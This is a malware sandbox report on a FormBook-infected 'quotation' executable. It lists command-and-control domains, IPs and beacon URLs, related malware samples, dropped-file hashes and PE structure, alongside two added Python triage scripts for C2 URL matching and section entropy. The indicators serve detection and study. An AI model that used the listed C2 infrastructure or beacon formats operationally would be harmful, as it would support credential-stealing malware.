13.248.169.48 | www.bonheur.tech | United States | 16509 | AMAZON-02US | true
103.106.67.112 | www.furrcali.xyz | New Zealand | 56030 | VOYAGERNET-AS-APVoyagerInternetLtdNZ | true
194.9.94.85 | www.milp.store | Sweden | 39570 | LOOPIASE | true
199.192.21.169 | www.bokus.site | United States | 22612 | NAMECHEAP-NETUS | true
47.83.1.90 | www.lejgnu.info | United States | 3209 | VODANETInternationalIP-BackboneofVodafoneDE | true
172.67.132.227 | www.ogbos88.cyou | United States | 13335 | CLOUDFLARENETUS | true
104.21.32.1 | www.mzkd6gp5.top | United States | 13335 | CLOUDFLARENETUS | true
202.95.11.110 | www.mirenzhibo.net | Singapore | 64050 | BCPL-SGBGPNETGlobalASNSG | true
136.243.64.147 | 100millionjobs.africa | Germany | 24940 | HETZNER-ASDE | true
45.33.2.79 | www.chiro.live | United States | 63949 | LINODE-APLinodeLLCUS | true
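The URL table above mixes three kinds of strings recovered from the injected processes: the FormBook beacon URLs (a four-character directory followed by one or two query keys, e.g. /cxj4/?80k=...&6B-l7F=...), certificate-revocation and browser search-engine URLs that belong to Firefox, and the Loopia parking-page content (utm_source=loopia_parkingweb) that one of the contacted C2 domains serves because it resolves into the LOOPIA AS. The Avira "safe" verdicts cover all of them, so a practitioner triaging this report has to separate the beacons by shape. The following script is an added example written for this page, not part of the Joe Sandbox report or of any tool it names; its input URLs and the host-to-IP rows are copied from the tables above (with the memory-dump suffixes stripped), and the RESOLVED map is deliberately incomplete because the report does not resolve every host:

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed input: URLs copied from this report's URL table and from the
# context column of the correlation tables, process/dump suffixes removed.
URLS = [
    "http://maximumgroup.co.za/cxj4/?80k=lRapCPMXgDk&6B-l7F=gKtC9mpNHTkTr00JCblrl8a3AfTX/duoM8EbXMKNjeYmE",
    "https://www.furrcali.xyz/k29t/?6B-l7F=mLM4NyV3Rm7LSF6x/a3vps0uRUV7zEkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGe",
    "http://www.rpa.asia/bwjl/",
    "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736438267.0098365932&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY",
    "https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe",
    "http://x1.c.lencr.org/0",
    "http://ocsp.rootca1.amazontrust.com0:",
    "https://www.google.com/favicon.ico",
]

# Host -> (IP, ASN) from the IP table above; only the rows needed here.
# maximumgroup.co.za is not resolved anywhere in the report, so it stays unmapped.
RESOLVED = {
    "www.furrcali.xyz": ("103.106.67.112", 56030),
    "www.rpa.asia": ("160.25.166.123", 17676),
    "www.chiro.live": ("45.33.2.79", 63949),
}

# FormBook check-in path: exactly four lowercase alphanumerics between slashes.
C2_PATH = re.compile(r"/[a-z0-9]{4}/")
# The GET beacon carries at most two query keys; parking and ad URLs carry more.
MAX_QUERY_KEYS = 2


def formbook_c2_candidates(urls):
    """Return {host: {path, keys, ip, asn}} for URLs shaped like FormBook beacons.

    Hosts without a query (the bare /xxxx/ path used for POSTs) are kept;
    URLs whose path does not end in a slash, or carry more than two keys,
    are dropped even when the directory happens to be four characters long.
    """
    found = {}
    for raw in urls:
        parts = urlsplit(raw.strip())
        host = parts.hostname  # lower-cased, trailing ':' with empty port tolerated
        if not host or not C2_PATH.fullmatch(parts.path):
            continue
        keys = [k for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
        if len(keys) > MAX_QUERY_KEYS:
            continue
        ip, asn = RESOLVED.get(host, (None, None))
        found[host] = {"path": parts.path, "keys": keys, "ip": ip, "asn": asn}
    return found


def shared_query_keys(candidates):
    """Map each query key to the hosts using it, keeping only keys seen on more than one host.

    FormBook derives the key names from the sample's configuration, so a key
    shared across hosts ties those hosts to the same config/campaign.
    """
    by_key = {}
    for host, info in candidates.items():
        for key in info["keys"]:
            by_key.setdefault(key, set()).add(host)
    return {k: sorted(hosts) for k, hosts in by_key.items() if len(hosts) > 1}


if __name__ == "__main__":
    hits = formbook_c2_candidates(URLS)
    for host, info in sorted(hits.items()):
        print(f"{host:22} {info['path']:8} keys={info['keys']} ip={info['ip']} asn={info['asn']}")
    print("keys shared across hosts:", shared_query_keys(hits))
```

Run as-is it keeps maximumgroup.co.za, www.furrcali.xyz and www.rpa.asia, drops www.chiro.live (four-character directory but no trailing slash and four query keys) together with the Loopia, Let's Encrypt, Amazon Trust and Google strings, and reports that the key 6B-l7F appears on two different hosts, which is the signal that both URLs come from one FormBook configuration rather than two unrelated infections. The path and key-count rule is a triage heuristic, not a signature; confirm a candidate against the Suricata hits and the process context (cmdkey.exe and SwDwSdNMaTt.exe, not firefox.exe) before treating it as C2.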
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1586807
Start date and time: 2025-01-09 16:50:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: QUOTATION#050125.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@17/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 75
• Number of non-executed functions: 328
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
• Excluded IPs from analysis (whitelisted): 150.171.30.10, 52.111.227.13
• Excluded domains from analysis (whitelisted): assets.msn.com, ctldl.windowsupdate.com, g.bing.com, nexusrules.officeapps.live.com, api.msn.com
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• VT rate limit hit for: QUOTATION#050125.exe
Time | Type | Description
10:54:13 | API Interceptor | 22326684x Sleep call for process: cmdkey.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
160.25.166.123 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | www.rpa.asia/bwjl/
160.25.166.123 | QUOTATION#050125.exe | malicious | FormBook | www.rpa.asia/bwjl/
160.25.166.123 | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | www.rpa.asia/ggyo/
13.248.169.48 | QUOTATION#050125.exe | malicious | FormBook | www.bonheur.tech/t3iv/
13.248.169.48 | ORDER REF 47896798 PSMCO.exe | malicious | FormBook, PureLog Stealer | www.londonatnight.coffee/13to/
13.248.169.48 | 236236236.elf | malicious | Unknown | portlandbeauty.com/
13.248.169.48 | profroma invoice.exe | malicious | FormBook | www.aktmarket.xyz/wb7v/
13.248.169.48 | SC_TR11670000_pdf.exe | malicious | FormBook | www.xphone.net/i7vz/
13.248.169.48 | RFQ_P.O.1212024.scr | malicious | FormBook | www.krshop.shop/5p01/
13.248.169.48 | SH8ZyOWNi2.exe | malicious | CMSBrute | sharewood.xyz/administrator/index.php
13.248.169.48 | MA-DS-2024-03 URGENT.exe | malicious | FormBook | www.snyp.shop/4nyz/
13.248.169.48 | Recibos.exe | malicious | FormBook | www.egyshare.xyz/lp5b/
13.248.169.48 | AWB_5771388044 Documente de expediere.exe | malicious | FormBook | www.avalanchefi.xyz/ctta/
103.106.67.112 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | www.furrcali.xyz/k29t/
103.106.67.112 | QUOTATION#050125.exe | malicious | FormBook | www.furrcali.xyz/k29t/
103.106.67.112 | rQuotation.exe | malicious | FormBook | www.furrcali.xyz/3dtl/?4v7=WTzrGLrFoDOf3MfqMggnB2yODJjw2W6R3d7AI4DzdlPnCYzv+YsvzCma/KjEqV7kmJXwzvABskUepNotbm90GG8Ab8L4vbMqXlBd8atmujJl3TdcKhvlJPk=&pRel=chN0
103.106.67.112 | PO 1202495088.exe | malicious | FormBook | www.furrcali.xyz/86f0/
103.106.67.112 | Viridine84.exe | malicious | FormBook, GuLoader | www.sailforever.xyz/p4rk/
103.106.67.112 | Doc 784-01965670.exe | malicious | FormBook | www.sailforever.xyz/hshp/
103.106.67.112 | BL.exe | malicious | FormBook | www.sailforever.xyz/hshp/
103.106.67.112 | BILL OF LADDING.exe | malicious | FormBook | www.sailforever.xyz/hshp/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.rpa.asia | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 160.25.166.123
www.rpa.asia | QUOTATION#050125.exe | malicious | FormBook | 160.25.166.123
www.rpa.asia | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | 160.25.166.123
www.milp.store | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 194.9.94.85
www.milp.store | QUOTATION#050125.exe | malicious | FormBook | 194.9.94.85
www.milp.store | PO-000172483 pdf.exe | malicious | FormBook, PureLog Stealer | 194.9.94.85
www.milp.store | new.exe | malicious | FormBook | 194.9.94.86
www.milp.store | PO 1202495088.exe | malicious | FormBook | 194.9.94.86
www.mirenzhibo.net | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 202.95.11.110
www.mirenzhibo.net | QUOTATION#050125.exe | malicious | FormBook | 202.95.11.110
www.mirenzhibo.net | rQuotation.exe | malicious | FormBook | 202.95.11.110
www.mirenzhibo.net | z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe | malicious | FormBook | 202.95.11.110
www.chiro.live | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 198.58.118.167
www.chiro.live | QUOTATION#050125.exe | malicious | FormBook | 45.33.23.183
www.bokus.site | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 199.192.21.169
www.bokus.site | QUOTATION#050125.exe | malicious | FormBook | 199.192.21.169
www.bonheur.tech | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 76.223.54.146
www.bonheur.tech | QUOTATION#050125.exe | malicious | FormBook | 13.248.169.48
www.bonheur.tech | PO 1202495088.exe | malicious | FormBook | 76.223.54.146
www.furrcali.xyz | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 103.106.67.112
www.furrcali.xyz | QUOTATION#050125.exe | malicious | FormBook | 103.106.67.112
www.furrcali.xyz | rQuotation.exe | malicious | FormBook | 103.106.67.112
www.furrcali.xyz | PO 1202495088.exe | malicious | FormBook | 103.106.67.112
Match | Associated Sample Name / URL | Detection | Threat Name | Context
GIGAINFRASoftbankBBCorpJP | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 160.25.166.123
GIGAINFRASoftbankBBCorpJP | 6.elf | malicious | Unknown | 126.228.237.104
GIGAINFRASoftbankBBCorpJP | QUOTATION#050125.exe | malicious | FormBook | 160.25.166.123
GIGAINFRASoftbankBBCorpJP | 5.elf | malicious | Unknown | 171.2.26.236
GIGAINFRASoftbankBBCorpJP | 6.elf | malicious | Unknown | 220.38.176.232
GIGAINFRASoftbankBBCorpJP | 6.elf | malicious | Unknown | 126.126.55.244
GIGAINFRASoftbankBBCorpJP | 3.elf | malicious | Unknown | 157.103.108.160
GIGAINFRASoftbankBBCorpJP | arm7.elf | malicious | Mirai, Moobot | 123.230.33.166
GIGAINFRASoftbankBBCorpJP | arm.elf | malicious | Mirai, Moobot | 221.51.193.17
GIGAINFRASoftbankBBCorpJP | 6.elf | malicious | Unknown | 220.8.167.167
AMAZON-02US | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 76.223.54.146
AMAZON-02US | NOTIFICATION_OF_DEPENDANTS.vbs | malicious | Xmrig | 52.222.214.68
AMAZON-02US | https://enterprisefocus.benchurl.com/c/l?u=11FC0F0E&e=193CF6A&c=173A1E&&t=0&l=11D51F9C4&email=s8sR2EUS6pcTEMAyWZX%2BTfGL0c%2FIo%2Bud&seq=2 | malicious | Unknown | 18.245.60.26
AMAZON-02US | NOTIFICATION_OF_DEPENDANTS.vbs | malicious | Xmrig | 52.222.214.68
AMAZON-02US | Benefit_401k_2025_Enrollment.pdf | malicious | Unknown | 54.191.80.159
AMAZON-02US | https://ccml.io/ | malicious | Unknown | 65.9.66.68
AMAZON-02US | i.elf | malicious | Unknown | 54.171.230.55
AMAZON-02US | 24EPV9vjc5.exe | malicious | Unknown | 18.244.18.122
AMAZON-02US | kXzODlqJak.exe | malicious | Unknown | 18.244.18.32
AMAZON-02US | https://combatironapparel.com/collections/ranger-panty-shorts | malicious | Unknown | 65.9.66.27
VOYAGERNET-AS-APVoyagerInternetLtdNZ | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook | 103.106.67.112
VOYAGERNET-AS-APVoyagerInternetLtdNZ | QUOTATION#050125.exe | malicious | FormBook | 103.106.67.112
VOYAGERNET-AS-APVoyagerInternetLtdNZ | 5.elf | malicious | Unknown | 202.154.140.238
VOYAGERNET-AS-APVoyagerInternetLtdNZ | rQuotation.exe | malicious | FormBook | 103.106.67.112
VOYAGERNET-AS-APVoyagerInternetLtdNZ | PO 1202495088.exe | malicious | FormBook | 103.106.67.112
VOYAGERNET-AS-APVoyagerInternetLtdNZ | na.elf | malicious | Unknown | 202.154.136.19
VOYAGERNET-AS-APVoyagerInternetLtdNZ | sora.mips.elf | malicious | Mirai | 202.154.140.249
VOYAGERNET-AS-APVoyagerInternetLtdNZ | loligang.mips-20241128-1536.elf | malicious | Mirai | 114.23.255.61
VOYAGERNET-AS-APVoyagerInternetLtdNZ | Viridine84.exe | malicious | FormBook, GuLoader | 103.106.67.112
VOYAGERNET-AS-APVoyagerInternetLtdNZ | sh4.elf | malicious | Mirai | 111.65.234.249
No context
No context

Process: C:\Windows\SysWOW64\cmdkey.exe
File Type: SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
Category: dropped
Size (bytes): 229376
Entropy (8bit): 0.9085960794285802
Encrypted: false
SSDEEP: 384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
MD5: 17091CB4BC9C6E80CA91C12E0BBA56F4
SHA1: ED7E485630B1245C7AE963FB02C899BF141DB578
SHA-256: 551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
SHA-512: A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
Malicious: false
Reputation: low
Preview: SQLite format 3......@ .......m...........b......................................................v............i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Users\user\Desktop\QUOTATION#050125.exe
File Type: data
Category: dropped
Size (bytes): 288256
Entropy (8bit): 7.993344154104057
Encrypted: true
SSDEEP: 6144:mIfg0s8wpiq0iNB26Dyplf7j+g7ePgU4Pp6ZiistBSmgMOoIQ:mIfg0s8sifi664t+E3Pp6ZXUBk+
MD5: 405A832D7C120671E90C0EB05AEDBB32
SHA1: 87F029D955DC3C8167111761BBAB2DB878BF5DBB
SHA-256: 1D27454FCF527F6238EE44E95F29379D73DB26E591D66250DCEAB0C9BC0379F3
SHA-512: 704FF96D93434DA56E46C422EBDD17CFCA71FD1A6D5DC7FCE13C12E6D84BBF7EEB44DCDA9A71BEA318509357061FC663DE52EEFA40D1C52F710F7E6F0FEF9527
Malicious: false
Reputation: low
Preview: ...Y4H285CDY..YD.7LCES9YwH281CDYVVYDD7LCES9Y7H281CDYVVYDD7LC.S9Y9W.61.M.w.X....+, .)E'UJP.d:787+0..&e!L7.!\.u..y;9=!j:AIaS9Y7H28HBM.k6>.yW+.x3^.-...##.L..xW+._....(U.c*'1k6>.D7LCES9Yg.28}BEY<...D7LCES9Y.H09:BOYV.]DD7LCES9Yg]281SDYV&]DD7.CEC9Y7J287CDYVVYDB7LCES9Y78681ADYVVYDF7..ES)Y7X281CTYVFYDD7LCUS9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYx"<<07LC..=Y7X281.@YVFYDD7LCES9Y7H28.CD9VVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LCES9Y7H281CDYVVYDD7LC
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.429417446472281
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: QUOTATION#050125.exe
File size: 1'755'136 bytes
MD5: b1261de24d9bcbf7395ae21722d32a37
SHA1: dd0d541b122ef10b820925b47ab94d76905df95c
SHA256: ba10f77f57b8d779c13abf725979c204d8f3b618ebd0d2f88e6c0cc7eb11c989
SHA512: 0d79f330fab83a736ab59a51447293f898af2d0175a051b38b35d4c3528d75cd4492edc288a82197c3c2f8d7923dfd44dac411f0bd81056c9f07d24c968ee1d2
SSDEEP: 24576:MqDEvCTbMWu7rQYlBQcBiT6rprG8aJ3X3N5uUKJThkkgDdwtaxFygI4V:MTvC/MTQYxsWR7aJH3N5uDFkkgDO/
TLSH: C085E1023791C022FF9B91330BA6F66597BC6E260127E51F13582DB9BE705B1163E7A3
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: 333333ab693b9b98
Entrypoint: 0x420577
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x677D278F [Tue Jan 7 13:09:35 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 948cc502fe9226992dce9417f952fce3
Instruction
call 00007FC378BC0C53h
jmp 00007FC378BC055Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC378BC073Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FC378BC070Ah
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FC378BC32FDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FC378BC3348h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FC378BC3331h
test byte ptr [ebp+08h], 00000001h
pop ecx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xd5c44 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1aa000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xd5c44 | 0xd5e00 | 55dd1cd250ad038bee459c5c8a93c5d9 | False | 0.9285243004821742 | data | 7.901171376041021 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1aa000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
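The section table above is what an analyst reads first when triaging a dropper: the .rsrc section carries an entropy of 7.90 (near the 8.0 ceiling of compressed or encrypted data) and is the largest section, which is consistent with a compiled AutoIt script whose payload is stored as a resource. The following script, an added example that is not code from the Joe Sandbox report or from the sample, parses PE section headers, computes per-section Shannon entropy and decodes the characteristics flags, then applies the two cheapest heuristics (high entropy, writable and executable). It builds a small two-section PE32 stub inline so that it runs offline; the entropy figures it prints are for that constructed stub, not for QUOTATION#050125.exe. The threshold of 7.0 is a common rule of thumb, not a value from the report.

```python
"""Section-table triage for a PE file: parse section headers, compute the Shannon entropy
of each section's raw bytes and decode the characteristics flags.

Added example, not code from the Joe Sandbox report or the analysed sample. The PE image it
analyses is a two-section stub constructed in build_sample_pe() for demonstration.
"""
import math
import random
import struct

# Section characteristics bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE = 0x02000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FLAG_NAMES = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_CNT_INITIALIZED_DATA: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    IMAGE_SCN_MEM_DISCARDABLE: "IMAGE_SCN_MEM_DISCARDABLE",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 8.0 is uniform random; packed or encrypted data sits near it."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def decode_flags(characteristics: int) -> list:
    return [name for bit, name in FLAG_NAMES.items() if characteristics & bit]


def parse_sections(image: bytes) -> list:
    """Walk IMAGE_DOS_HEADER -> IMAGE_NT_HEADERS -> section headers; one dict per section."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4  # IMAGE_FILE_HEADER starts right after the signature
    number_of_sections = struct.unpack_from("<H", image, coff + 2)[0]
    size_of_optional_header = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + size_of_optional_header  # first IMAGE_SECTION_HEADER (40 bytes each)
    sections = []
    for i in range(number_of_sections):
        (name, vsize, va, raw_size, raw_ptr, _reloc_ptr, _line_ptr,
         _n_reloc, _n_line, chars) = struct.unpack_from("<8sIIIIIIHHI", image, table + 40 * i)
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": va,
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": shannon_entropy(raw),
            "characteristics": chars,
            "flags": decode_flags(chars),
        })
    return sections


def triage(sections: list, entropy_threshold: float = 7.0) -> list:
    """Return (section name, reason) pairs for the two cheapest packer/loader heuristics."""
    findings = []
    for s in sections:
        if s["entropy"] >= entropy_threshold:
            findings.append((s["name"], f"entropy {s['entropy']:.2f} >= {entropy_threshold}: "
                                        "compressed or encrypted content"))
        if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append((s["name"], "section is both writable and executable"))
    return findings


def build_sample_pe() -> bytes:
    """Constructed two-section PE32 stub (hypothetical; not the analysed sample)."""
    file_align = 0x200
    text_data = b"ABCD" * 1024  # 4 KiB with exactly four symbols: entropy 2.0
    rng = random.Random(1)
    rsrc_data = bytes(rng.getrandbits(8) for _ in range(4096))  # stands in for a packed payload
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: NT headers follow the DOS header
    optional = struct.pack("<H", 0x10B) + b"\0" * 222  # PE32 magic, remaining fields zeroed
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(optional), 0x0102)

    def section(name, va, data, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), raw_ptr, 0, 0, 0, 0, chars)

    text_ptr = file_align
    rsrc_ptr = text_ptr + len(text_data)
    headers = bytes(dos) + b"PE\0\0" + coff + optional
    headers += section(b".text", 0x1000, text_data, text_ptr,
                       IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ)
    headers += section(b".rsrc", 0x3000, rsrc_data, rsrc_ptr,
                       IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ)
    return headers.ljust(file_align, b"\0") + text_data + rsrc_data


if __name__ == "__main__":
    secs = parse_sections(build_sample_pe())
    for s in secs:
        print(f"{s['name']:<8} VA=0x{s['virtual_address']:x} raw=0x{s['raw_size']:x} "
              f"entropy={s['entropy']:.3f} {', '.join(s['flags'])}")
    for name, reason in triage(secs):
        print(f"[!] {name}: {reason}")
```

Run against a real file, `parse_sections(open(path, "rb").read())` reproduces the Name, Virtual Address, Virtual Size, Raw Size, Entropy and Characteristics columns of the table above; the ZLIB complexity column is a separate measure (compressed size divided by raw size) that the report computes in addition to entropy.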
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd4548 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
